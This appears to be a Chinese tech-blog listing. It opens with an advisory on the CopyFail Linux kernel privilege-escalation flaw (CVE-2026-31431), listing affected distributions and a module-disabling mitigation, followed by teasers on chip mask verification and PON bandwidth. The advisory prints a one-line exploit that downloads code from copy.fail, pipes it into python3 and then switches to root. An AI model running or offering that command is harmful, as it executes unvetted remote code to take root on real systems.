Linux高危漏洞CopyFail(CVE-2026-31431)需要紧急修复

   |  1   |  51   |  SK

2026年5月6日,Linux内核7.0及更早版本被曝存在高危漏洞CopyFail(CVE-2026-31431),攻击者可借其由低权限提权至root。
该漏洞于3月下旬披露,补丁已发布但尚未全面推送。
美国CISA要求联邦机构于5月15日前完成修复。漏洞影响红帽RHEL 10.1、Ubuntu 24.04、Amazon Linux 2023、SUSE 16等主流发行版,亦波及Kubernetes及容器环境。
虽无法直接远程利用,但可与远程漏洞组合攻击或通过恶意链接、供应链投毒触发。

临时修复方案

sudo tee /etc/modprobe.d/disable-algif-aead.conf <<<'install algif_aead /bin/false'
sudo rmmod algif_aead 2>/dev/null

在线直接提权

curl https://copy.fail/exp | python3
su
id

漏洞影响系统

该漏洞影响默认启用或可加载algifaead模块的Linux系统,已知受影响的产品如下:
1.Ubuntu24.04LTS 及 以 下;
2.AmazonLinux2023及以 下;
3.RedHatEnterpriseLinux10及 以 下;
4.RedHatEnterpriseLinux9及 以 下;
5.RedHatEnterpriseLinux8及 以 下;
6.SUSE16及以下;
7.Debian/Arch/Fedora/Rocky/Alma/Oracle等同期内核版本;
8.统信(UOS)1070、1060;
9.麒麟(Kylin)V11、V10;
10.openEuler 24.03 (LTS-SP1);
itcad 

JDV(Job Deck View)流程及注意事项

   |  1   |  25   |  SK

JDV指在版图数据送往工艺厂流片前,由工艺厂返回的mask图像数据,用于对比、验证版图数据的正确性。确保制造过程中不会出现错误,从而避免因数据偏差导致的芯片报废风险。该验证环节是流片前的最后检查,出错概率极低但需严谨对待。

[阅读全文]
itcad 

PON网络的上行带宽管理

   |  1   |  59   |  SK

在PON网络中,OLT设备的一个PON口会下挂一堆的ONU,因此,PON口的上行带宽是所有ONU共享的,那么上行带宽是如何在各ONU之间分配的呢?
个是在2024年网规案例分析题最后一个大题。

[阅读全文]
Devops